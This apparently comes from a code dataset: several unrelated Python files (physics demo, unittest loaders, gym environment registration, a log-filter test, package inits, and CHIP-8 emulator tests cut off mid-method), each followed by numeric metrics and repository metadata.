#?autoTester.check (300)
# --- Executed only by CPython ---
autoTester.check (300) #__: skip
__pragma__ ('noecom') # ===================================================================
# --- Executed by none ---
'''?
for i in range (30, 40):
autoTester.check (i)
?'''
# --- Executed by none ---
#?autoTester.check (400)
| 24.147059 | 96 | 0.437881 | 142 | 1,642 | 4.78169 | 0.225352 | 0.265096 | 0.164948 | 0.097202 | 0.880707 | 0.877761 | 0.771723 | 0.771723 | 0.633284 | 0.621502 | 0 | 0.031122 | 0.256395 | 1,642 | 67 | 97 | 24.507463 | 0.52498 | 0.56821 | 0 | 0.2 | 0 | 0 | 0.022173 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
522e5ef3fa4278298ee9b9e92220e6db7c937be5 | 482 | py | Python | docs/joint/joint9.py | danbst/pymunk-tutorial | 2012ca168e5de1588404e7ef6d2dd3770df6f291 | [
"MIT"
] | 4 | 2020-09-22T09:02:00.000Z | 2022-03-06T19:42:18.000Z | docs/joint/joint9.py | danbst/pymunk-tutorial | 2012ca168e5de1588404e7ef6d2dd3770df6f291 | [
"MIT"
] | null | null | null | docs/joint/joint9.py | danbst/pymunk-tutorial | 2012ca168e5de1588404e7ef6d2dd3770df6f291 | [
"MIT"
] | 3 | 2021-04-23T09:24:19.000Z | 2022-03-29T17:54:47.000Z | # ratchet joint
from joint import *
p0 = Vec2d(100, 120)
v = Vec2d(60, 0)
arm = Segment(p0, v)
PivotJoint(b0, arm.body, p0)
SimpleMotor(b0, arm.body, 1)
arm2 = Segment(p0+v, v)
PivotJoint(arm.body, arm2.body, v)
RatchetJoint(arm.body, arm2.body, 0, math.pi/2)
p0 = Vec2d(300, 120)
arm = Segment(p0, v)
PivotJoint(b0, arm.body, p0)
SimpleMotor(b0, arm.body, 1)
arm2 = Segment(p0+v, v)
PivotJoint(arm.body, arm2.body, v)
RatchetJoint(arm.body, arm2.body, 0, math.pi/8)
App().run() | 20.956522 | 47 | 0.682573 | 87 | 482 | 3.781609 | 0.310345 | 0.170213 | 0.121581 | 0.182371 | 0.790274 | 0.790274 | 0.790274 | 0.790274 | 0.790274 | 0.790274 | 0 | 0.100962 | 0.136929 | 482 | 23 | 48 | 20.956522 | 0.689904 | 0.024896 | 0 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
528b374c5759cc9e56895177c88ffc2889843ed0 | 237 | py | Python | tests/__init__.py | faintlines/flask-expects-json | 72d9d710f17e96d975ce9f470c38ea736d6e813f | [
"MIT"
] | 45 | 2018-02-15T02:24:00.000Z | 2022-03-03T19:22:40.000Z | tests/__init__.py | faintlines/flask-expects-json | 72d9d710f17e96d975ce9f470c38ea736d6e813f | [
"MIT"
] | 20 | 2018-01-30T19:03:48.000Z | 2022-03-04T09:32:29.000Z | tests/__init__.py | faintlines/flask-expects-json | 72d9d710f17e96d975ce9f470c38ea736d6e813f | [
"MIT"
] | 11 | 2019-05-21T12:53:49.000Z | 2021-11-03T12:01:12.000Z | import unittest
def loader():
return unittest.TestLoader().discover('tests', pattern='test*.py')
def test_suite():
return unittest.TestSuite(loader())
def run():
return unittest.TextTestRunner(verbosity=2).run(loader()) | 18.230769 | 70 | 0.708861 | 28 | 237 | 5.964286 | 0.607143 | 0.251497 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004878 | 0.135021 | 237 | 13 | 71 | 18.230769 | 0.809756 | 0 | 0 | 0 | 0 | 0 | 0.054622 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | true | 0 | 0.142857 | 0.428571 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
bfeac2a6bbfa4c186d70640701cd5820e4a27929 | 1,201 | py | Python | tests/test_iteration_parameters.py | erdc/AdhModel | 2c5d49dd4cca484a6c46ded6e1f6dec25db4722c | [
"BSD-3-Clause"
] | 3 | 2019-06-26T13:41:46.000Z | 2019-10-16T02:11:29.000Z | tests/test_iteration_parameters.py | erdc/AdhModel | 2c5d49dd4cca484a6c46ded6e1f6dec25db4722c | [
"BSD-3-Clause"
] | 5 | 2019-06-26T14:29:03.000Z | 2019-07-15T19:25:59.000Z | tests/test_iteration_parameters.py | erdc/AdhModel | 2c5d49dd4cca484a6c46ded6e1f6dec25db4722c | [
"BSD-3-Clause"
] | 2 | 2019-07-26T14:31:14.000Z | 2019-09-03T18:06:39.000Z | import unittest
from adhmodel.simulation.iteration_parameters import IterationParameters
class TestIo(unittest.TestCase):
def test_dependency_non_linear_tolerance_option(self):
ip = IterationParameters()
ip.non_linear_tolerance_option = 'Specify residual and incremental (IP NTL & IP ITL)'
self.assertGreater(ip.param.non_linear_residual_tolerance.precedence, 0)
self.assertGreater(ip.param.non_linear_incremental_tolerance.precedence, 0)
ip.non_linear_tolerance_option = 'Specify residual (IP NTL)'
self.assertGreater(ip.param.non_linear_residual_tolerance.precedence, 0)
self.assertLess(ip.param.non_linear_incremental_tolerance.precedence, 0)
ip.non_linear_tolerance_option = 'Specify incremental (IP ITL)'
self.assertLess(ip.param.non_linear_residual_tolerance.precedence, 0)
self.assertGreater(ip.param.non_linear_incremental_tolerance.precedence, 0)
ip.non_linear_tolerance_option = 'Specify residual and incremental (IP NTL & IP ITL)'
self.assertGreater(ip.param.non_linear_residual_tolerance.precedence, 0)
self.assertGreater(ip.param.non_linear_incremental_tolerance.precedence, 0)
| 60.05 | 93 | 0.777685 | 147 | 1,201 | 6.068027 | 0.210884 | 0.131166 | 0.089686 | 0.143498 | 0.782511 | 0.782511 | 0.755605 | 0.755605 | 0.755605 | 0.755605 | 0 | 0.007782 | 0.144047 | 1,201 | 19 | 94 | 63.210526 | 0.859922 | 0 | 0 | 0.470588 | 0 | 0 | 0.127394 | 0 | 0 | 0 | 0 | 0 | 0.470588 | 1 | 0.058824 | false | 0 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
87009b366914ef12134d5d8cfecdf6c8d5107424 | 1,870 | py | Python | gymfc/gymfc/__init__.py | prokhn/onti-2019-bigdata | b9296141958f544177388be94072efce7bdc7814 | [
"MIT"
] | 1 | 2018-12-18T01:19:33.000Z | 2018-12-18T01:19:33.000Z | gymfc/gymfc/__init__.py | prokhn/onti-2019-bigdata | b9296141958f544177388be94072efce7bdc7814 | [
"MIT"
] | null | null | null | gymfc/gymfc/__init__.py | prokhn/onti-2019-bigdata | b9296141958f544177388be94072efce7bdc7814 | [
"MIT"
] | null | null | null | from gym.envs.registration import register
import math
MAX_MEMORY = 11
default_kwargs = {
}
#Episodic task with ESC supporting sensors for telemetry
kwargs = {
"memory_size": 1,
"max_sim_time": 1.,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr-MotorVel_M4_Ep-v0'
register(
id=id,
entry_point='gymfc.envs:GyroErrorESCVelocityFeedbackEnv',
kwargs=kwargs)
# Optionally allow different memories
for i in range(1,MAX_MEMORY):
kwargs = {
"memory_size": i,
"max_sim_time": 1.,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr{}-MotorVel{}_M4_Ep-v0'.format(i, i)
register(
id=id,
entry_point='gymfc.envs:GyroErrorESCVelocityFeedbackEnv',
kwargs=kwargs)
# Continuous task
kwargs = {
"memory_size": 1,
"command_time_off":[0.1, 1.0],
"command_time_on":[0.1, 1.0],
"max_sim_time": 60,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr-MotorVel_M4_Con-v0'
register(
id=id,
entry_point='gymfc.envs:GyroErrorESCVelocityFeedbackContinuousEnv',
kwargs=kwargs)
# And with extra memory
for i in range(1,MAX_MEMORY):
kwargs = {
"memory_size": i,
"command_time_off":[0.1, 1.0],
"command_time_on":[0.1, 1.0],
"max_sim_time": 60,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr{}-MotorVel{}_M4_Con-v0'.format(i, i)
register(
id=id,
entry_point='gymfc.envs:GyroErrorESCVelocityFeedbackContinuousEnv',
kwargs=kwargs)
# For flight control systems without ESC sensors
for i in range(1,MAX_MEMORY):
kwargs = {
"memory_size": i,
"max_sim_time": 1.,
}
kwargs.update(default_kwargs)
id = 'AttFC_GyroErr{}_M4_Ep-v0'.format(i)
register(
id=id,
entry_point='gymfc.envs:GyroErrorFeedbackEnv',
kwargs=kwargs)
| 24.605263 | 75 | 0.648128 | 239 | 1,870 | 4.849372 | 0.246862 | 0.067299 | 0.069025 | 0.107852 | 0.750647 | 0.740293 | 0.740293 | 0.740293 | 0.712683 | 0.712683 | 0 | 0.027701 | 0.227807 | 1,870 | 75 | 76 | 24.933333 | 0.774931 | 0.094118 | 0 | 0.741935 | 0 | 0 | 0.328005 | 0.223209 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032258 | 0 | 0.032258 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
870f55149b1e3975c84ca32875c4953c0dfae777 | 2,339 | py | Python | tests/test_filter.py | obss/pigeons | 3965310c8ea45d2948b2ffd42d0369f9baaa4ab4 | [
"MIT"
] | 10 | 2021-07-16T12:51:14.000Z | 2022-01-26T06:30:12.000Z | tests/test_filter.py | obss/pigeons | 3965310c8ea45d2948b2ffd42d0369f9baaa4ab4 | [
"MIT"
] | null | null | null | tests/test_filter.py | obss/pigeons | 3965310c8ea45d2948b2ffd42d0369f9baaa4ab4 | [
"MIT"
] | 1 | 2021-07-16T12:55:06.000Z | 2021-07-16T12:55:06.000Z | import logging
from pigeons.filter import TeamsFilter
def test_filter_without_capture_flags():
log_record_dict = {"msg": "Test log at INFO level.", "levelno": logging.INFO}
test_log_record = logging.makeLogRecord(log_record_dict)
tf = TeamsFilter(level=logging.INFO)
filtered = tf.filter(test_log_record)
assert filtered
def test_filter_with_capture_flags():
capture_flag = "$test_flag "
log_record_dict_true = {"msg": capture_flag + "Test log at INFO level.", "levelno": logging.INFO}
log_record_dict_false = {"msg": "Test log at INFO level.", "levelno": logging.INFO}
test_log_record_true = logging.makeLogRecord(log_record_dict_true)
test_log_record_false = logging.makeLogRecord(log_record_dict_false)
tf = TeamsFilter(level=logging.INFO, capture_flags=[capture_flag])
filtered_true = tf.filter(test_log_record_true)
filtered_false = tf.filter(test_log_record_false)
assert filtered_true and not filtered_false
def test_filter_with_higher_levels():
capture_flag = "$test_flag "
log_record_dict_true = {"msg": capture_flag + "Test log at INFO level.", "levelno": logging.ERROR}
log_record_dict_false = {"msg": "Test log at INFO level.", "levelno": logging.ERROR}
test_log_record_true = logging.makeLogRecord(log_record_dict_true)
test_log_record_false = logging.makeLogRecord(log_record_dict_false)
tf = TeamsFilter(level=logging.INFO, capture_flags=[capture_flag])
# Both should pass regardless of flags.
filtered_true = tf.filter(test_log_record_true)
filtered_false = tf.filter(test_log_record_false)
assert filtered_true and filtered_false
def test_filter_with_lower_levels():
capture_flag = "$test_flag "
log_record_dict_true = {"msg": capture_flag + "Test log at DEBUG level.", "levelno": logging.DEBUG}
log_record_dict_false = {"msg": "Test log at DEBUG level.", "levelno": logging.DEBUG}
test_log_record_true = logging.makeLogRecord(log_record_dict_true)
test_log_record_false = logging.makeLogRecord(log_record_dict_false)
tf = TeamsFilter(level=logging.INFO, capture_flags=[capture_flag])
# Both should fail regardless of flags.
filtered_true = tf.filter(test_log_record_true)
filtered_false = tf.filter(test_log_record_false)
assert not filtered_true and not filtered_false
| 41.767857 | 103 | 0.761009 | 328 | 2,339 | 5.051829 | 0.121951 | 0.152082 | 0.109837 | 0.122511 | 0.900422 | 0.850332 | 0.793603 | 0.793603 | 0.732046 | 0.732046 | 0 | 0 | 0.145789 | 2,339 | 55 | 104 | 42.527273 | 0.829329 | 0.032065 | 0 | 0.473684 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
875299205a616e79629e4dd5496849f44d8700de | 40 | py | Python | bolt/discord/__init__.py | ph7vc/CL4M-B0T | e992cf63b1215ea7c241cab94edc251653dbaed7 | [
"MIT"
] | 9 | 2019-02-17T06:33:14.000Z | 2021-10-05T02:19:00.000Z | bolt/discord/__init__.py | ns-phennessy/Bolt | e992cf63b1215ea7c241cab94edc251653dbaed7 | [
"MIT"
] | 28 | 2019-02-10T07:48:05.000Z | 2021-12-20T00:15:37.000Z | bolt/discord/__init__.py | ph7vc/CL4M-B0T | e992cf63b1215ea7c241cab94edc251653dbaed7 | [
"MIT"
] | 4 | 2015-03-13T03:58:55.000Z | 2015-05-27T08:29:46.000Z | from bolt.discord.events import Events
| 20 | 39 | 0.825 | 6 | 40 | 5.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 40 | 1 | 40 | 40 | 0.942857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
875ef4ba0b572ae3da393904a852db6f94ed6340 | 58 | py | Python | fpdb/common/__init__.py | xvzezi/filedb-python | 513de426976e2782aa9aced1a2bf522db7aae51d | [
"MIT"
] | null | null | null | fpdb/common/__init__.py | xvzezi/filedb-python | 513de426976e2782aa9aced1a2bf522db7aae51d | [
"MIT"
] | null | null | null | fpdb/common/__init__.py | xvzezi/filedb-python | 513de426976e2782aa9aced1a2bf522db7aae51d | [
"MIT"
] | null | null | null | from . import cache
from . import table
from . import util | 19.333333 | 19 | 0.758621 | 9 | 58 | 4.888889 | 0.555556 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189655 | 58 | 3 | 20 | 19.333333 | 0.93617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5e3ecf6e6c8ed986cb6fe625ec64fffdc7fbbaaf | 63 | py | Python | sora/prediction/__init__.py | rcboufleur/SORA | 43a6409af0f6557daa3153ac95798964e1fd59e2 | [
"MIT"
] | 11 | 2021-09-08T15:27:34.000Z | 2022-03-02T16:39:24.000Z | sora/prediction/__init__.py | rcboufleur/SORA | 43a6409af0f6557daa3153ac95798964e1fd59e2 | [
"MIT"
] | 2 | 2021-10-02T09:39:05.000Z | 2022-03-24T12:57:16.000Z | sora/prediction/__init__.py | rcboufleur/SORA | 43a6409af0f6557daa3153ac95798964e1fd59e2 | [
"MIT"
] | 8 | 2021-08-29T12:52:36.000Z | 2022-02-02T06:22:50.000Z | from .core import *
from .table import *
from .occmap import *
| 15.75 | 21 | 0.714286 | 9 | 63 | 5 | 0.555556 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 63 | 3 | 22 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5e4fa681700fff1f5b7915c2893d906c62e94249 | 202 | py | Python | cornflow/schemas/model_json.py | pchtsp/corn | 2811ad400f3f3681a159984eabf4fee1fc99b433 | [
"MIT"
] | 5 | 2021-11-24T02:43:22.000Z | 2021-12-10T09:28:32.000Z | cornflow/schemas/model_json.py | pchtsp/corn | 2811ad400f3f3681a159984eabf4fee1fc99b433 | [
"MIT"
] | 125 | 2021-09-01T12:06:48.000Z | 2022-03-30T11:32:57.000Z | cornflow/schemas/model_json.py | pchtsp/corn | 2811ad400f3f3681a159984eabf4fee1fc99b433 | [
"MIT"
] | 1 | 2021-06-15T19:43:16.000Z | 2021-06-15T19:43:16.000Z | from cornflow_client import SchemaManager, get_pulp_jsonschema
import os
fileDir = os.path.dirname(__file__)
manager = SchemaManager(get_pulp_jsonschema())
DataSchema = manager.jsonschema_to_flask()
| 22.444444 | 62 | 0.831683 | 25 | 202 | 6.28 | 0.68 | 0.203822 | 0.254777 | 0.382166 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094059 | 202 | 8 | 63 | 25.25 | 0.857924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5e7f16ad29f43fd56b8296caf60dbcaca8889209 | 41,041 | py | Python | test/emulator_test.py | kazeraniman/ChipPy | 15669c5dc46ccb76020264698cb4866111d4fe36 | [
"MIT"
] | null | null | null | test/emulator_test.py | kazeraniman/ChipPy | 15669c5dc46ccb76020264698cb4866111d4fe36 | [
"MIT"
] | null | null | null | test/emulator_test.py | kazeraniman/ChipPy | 15669c5dc46ccb76020264698cb4866111d4fe36 | [
"MIT"
] | null | null | null | from unittest import mock
from src.emulator import Emulator, GAME_START_ADDRESS, INTERPRETER_END_ADDRESS, RAM_SIZE, HEX_SIZE, OPCODE_SIZE
class TestHelperMethods:
def setup_method(self):
self.emulator = Emulator()
def test_load_digit_sprites(self):
self.emulator.ram = bytearray(RAM_SIZE)
self.emulator.load_digit_sprites()
for index, byte in enumerate(self.emulator.ram):
if index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Ram outside of the sprite storage was modified."
assert self.emulator.ram[0] == int("f0", HEX_SIZE), "The first byte of the 0 sprite is incorrect."
assert self.emulator.ram[1] == int("90", HEX_SIZE), "The second byte of the 0 sprite is incorrect."
assert self.emulator.ram[2] == int("90", HEX_SIZE), "The third byte of the 0 sprite is incorrect."
assert self.emulator.ram[3] == int("90", HEX_SIZE), "The fourth byte of the 0 sprite is incorrect."
assert self.emulator.ram[4] == int("f0", HEX_SIZE), "The fifth byte of the 0 sprite is incorrect."
assert self.emulator.ram[35] == int("f0", HEX_SIZE), "The first byte of the 7 sprite is incorrect."
assert self.emulator.ram[36] == int("10", HEX_SIZE), "The second byte of the 7 sprite is incorrect."
assert self.emulator.ram[37] == int("20", HEX_SIZE), "The third byte of the 7 sprite is incorrect."
assert self.emulator.ram[38] == int("40", HEX_SIZE), "The fourth byte of the 7 sprite is incorrect."
assert self.emulator.ram[39] == int("40", HEX_SIZE), "The fifth byte of the 7 sprite is incorrect."
assert self.emulator.ram[75] == int("f0", HEX_SIZE), "The first byte of the F sprite is incorrect."
assert self.emulator.ram[76] == int("80", HEX_SIZE), "The second byte of the F sprite is incorrect."
assert self.emulator.ram[77] == int("f0", HEX_SIZE), "The third byte of the F sprite is incorrect."
assert self.emulator.ram[78] == int("80", HEX_SIZE), "The fourth byte of the F sprite is incorrect."
assert self.emulator.ram[79] == int("80", HEX_SIZE), "The fifth byte of the F sprite is incorrect."
def test_get_upper_nibble(self):
assert self.emulator.get_upper_nibble(int("5b", HEX_SIZE)) == 5, "Could not get correct upper nibble in normal byte."
assert self.emulator.get_upper_nibble(int("50", HEX_SIZE)) == 5, "Could not get correct upper nibble in byte with 0 lower nibble."
        assert self.emulator.get_upper_nibble(int("b", HEX_SIZE)) == 0, "Could not get correct upper nibble in byte with no upper nibble."
def test_get_lower_nibble(self):
assert self.emulator.get_lower_nibble(int("5b", HEX_SIZE)) == 11, "Could not get correct lower nibble in normal byte."
assert self.emulator.get_lower_nibble(int("50", HEX_SIZE)) == 0, "Could not get correct lower nibble in byte with 0 lower nibble."
        assert self.emulator.get_lower_nibble(int("b", HEX_SIZE)) == 11, "Could not get correct lower nibble in byte with no upper nibble."
def test_bounded_subtract(self):
assert self.emulator.bounded_subtract(200, 100) == (100, 1), "Incorrect subtraction with positive result."
assert self.emulator.bounded_subtract(33, 33) == (0, 1), "Incorrect subtraction with 0 result."
assert self.emulator.bounded_subtract(100, 200) == (156, 0), "Incorrect subtraction with negative result."
class TestIndividualOpcodes:
def setup_method(self):
self.emulator = Emulator()
def test_opcode_return_from_subroutine(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert len(self.emulator.stack) == 0, "Stack starting out non-empty."
self.emulator.opcode_return_from_subroutine(bytes.fromhex("00EE"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Returning from a subroutine when not in one messed up the program counter."
assert len(self.emulator.stack) == 0, "Stack got into a weird state when trying to return from a subroutine when not in one."
self.emulator.stack = [2000, 3000]
self.emulator.opcode_return_from_subroutine(bytes.fromhex("00EE"))
assert self.emulator.program_counter == 3000, "Program counter set to wrong value when returning from a subroutine."
assert len(self.emulator.stack) == 1, "Stack entries incorrect after returning from a subroutine."
self.emulator.opcode_return_from_subroutine(bytes.fromhex("00EE"))
assert self.emulator.program_counter == 2000, "Program counter set to wrong value when returning from a subroutine."
assert len(self.emulator.stack) == 0, "Stack entries incorrect after returning from a subroutine."
def test_opcode_goto(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.opcode_goto(bytes.fromhex("14e5"))
assert self.emulator.program_counter == int("4e5", HEX_SIZE), "Program counter incorrect after jump opcode."
def test_opcode_call_subroutine(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert len(self.emulator.stack) == 0, "Stack starting out non-empty."
self.emulator.opcode_call_subroutine(bytes.fromhex("2578"))
assert self.emulator.program_counter == int("578", HEX_SIZE), "Program counter incorrect after subroutine call."
assert len(self.emulator.stack) == 1 and self.emulator.stack[0] == GAME_START_ADDRESS, "Previous program counter not added to the stack."
self.emulator.opcode_call_subroutine(bytes.fromhex("2a23"))
assert self.emulator.program_counter == int("a23", HEX_SIZE), "Program counter incorrect after subroutine call."
assert len(self.emulator.stack) == 2 and self.emulator.stack[1] == int("578", HEX_SIZE), "Previous program counter not added to the stack."
assert len(self.emulator.stack) == 2 and self.emulator.stack[0] == GAME_START_ADDRESS, "Earlier stack value was modified."
def test_opcode_if_equal(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert self.emulator.registers[6] == 0, "Register starting at an unexpected value."
self.emulator.opcode_if_equal(bytes.fromhex("3698"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite register value not matching."
self.emulator.registers[6] = int("98", HEX_SIZE)
self.emulator.opcode_if_equal(bytes.fromhex("3698"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_if_not_equal(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.registers[6] = int("98", HEX_SIZE)
self.emulator.opcode_if_not_equal(bytes.fromhex("3698"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite register value matching."
self.emulator.registers[6] = int("ff", HEX_SIZE)
self.emulator.opcode_if_not_equal(bytes.fromhex("3698"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_if_register_equal(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.registers[10] = int("11", HEX_SIZE)
self.emulator.registers[4] = int("12", HEX_SIZE)
self.emulator.opcode_if_register_equal(bytes.fromhex("5a40"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite register values matching."
self.emulator.registers[10] = int("40", HEX_SIZE)
self.emulator.registers[4] = int("40", HEX_SIZE)
self.emulator.opcode_if_register_equal(bytes.fromhex("5a40"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_set_register_value(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.opcode_set_register_value(bytes.fromhex("6133"))
for index, register in enumerate(self.emulator.registers):
if index == 1:
assert register == int("33", HEX_SIZE), "Register not set to correct value."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_add_value(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[11] = 10
self.emulator.opcode_add_value(bytes.fromhex("7b05"))
for index, register in enumerate(self.emulator.registers):
if index == 11:
assert register == 15, "Register addition failed."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_add_value(bytes.fromhex("7bfa"))
assert self.emulator.registers[11] == 9, "Register addition overflow did not work as expected."
        assert self.emulator.registers[15] == 0, "Carry bit was set when it should not have been modified by this instruction."
def test_opcode_set_register_value_other_register(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[8] = 47
self.emulator.opcode_set_register_value_other_register(bytes.fromhex("8480"))
for index, register in enumerate(self.emulator.registers):
if index == 4 or index == 8:
assert register == 47, "Register not set to correct value."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_set_register_bitwise_or(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 170
self.emulator.registers[8] = 85
self.emulator.opcode_set_register_bitwise_or(bytes.fromhex("8481"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 255, "Register not set to correct value."
elif index == 8:
assert register == 85, "Second register value was modified when it should not have been."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_set_register_bitwise_and(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 204
self.emulator.registers[8] = 170
self.emulator.opcode_set_register_bitwise_and(bytes.fromhex("8482"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 136, "Register not set to correct value."
elif index == 8:
assert register == 170, "Second register value was modified when it should not have been."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_set_register_bitwise_xor(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 204
self.emulator.registers[8] = 170
self.emulator.opcode_set_register_bitwise_xor(bytes.fromhex("8483"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 102, "Register not set to correct value."
elif index == 8:
assert register == 170, "Second register value was modified when it should not have been."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_add_other_register(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 200
self.emulator.registers[8] = 33
self.emulator.opcode_add_other_register(bytes.fromhex("8484"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 233, "Register not set to correct value."
elif index == 8:
assert register == 33, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Carry flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_add_other_register(bytes.fromhex("8484"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
